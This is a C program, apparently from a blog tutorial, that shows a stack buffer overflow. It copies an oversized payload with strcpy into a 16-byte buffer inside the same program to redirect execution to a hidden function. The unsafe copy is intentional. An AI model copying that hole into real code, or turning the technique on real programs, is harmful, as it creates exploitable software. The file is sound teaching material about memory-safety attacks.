/**
* my_exploit.c - WORKING EXPLOIT for YOUR system
* Your offset: 24 bytes
* Your target address: 0x401530
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
// UPDATE THIS LINE WITH YOUR OFFSET (from debug output)
#define OFFSET 24 // ? YOUR OFFSET GOES HERE (you have 24)
void secret_function() {
printf("\n");
printf("+--------------------------------------------------------------+\n");
printf("¦ ?????? SUCCESS! EXECUTION HIJACKED! ?????? ¦\n");
printf("¦ ¦\n");
printf("¦ Buffer overflow worked! ¦\n");
printf("¦ Offset used: %d bytes ¦\n", OFFSET);
printf("+--------------------------------------------------------------+\n");
printf("\n");
exit(0);
}
void normal_function() {
printf(" This should NOT print if exploit works!\n");
}
void vulnerable(char *input) {
char buffer[16];
printf("\n Copying input to buffer...\n");
strcpy(buffer, input); // VULNERABLE!
printf(" Returning from vulnerable...\n");
}
int main() {
printf("\n");
printf("+--------------------------------------------------------------+\n");
printf("¦ BUFFER OVERFLOW EXPLOIT ¦\n");
printf("¦ Using offset: %d bytes ¦\n", OFFSET);
printf("+--------------------------------------------------------------+\n");
// Target address from your debug output
unsigned long addr = 0x401530; // ? YOUR TARGET ADDRESS
printf("\n Target address: 0x%lx\n", addr);
// Build the payload
char payload[200];
// Step 1: Fill buffer and saved frame pointer (24 bytes of 'A's)
memset(payload, 'A', OFFSET);
// Step 2: Overwrite return address with secret_function address
memcpy(payload + OFFSET, &addr, sizeof(addr));
// Step 3: Null terminate
payload[OFFSET + sizeof(addr)] = '\0';
printf(" Payload size: %zu bytes\n", strlen(payload));
printf("\n ?? Launching exploit...\n");
// Execute the exploit
vulnerable(payload);
// If we get here, exploit failed
printf("\n ? If you see this, exploit failed\n");
normal_function();
return 0;
}
Leave a Reply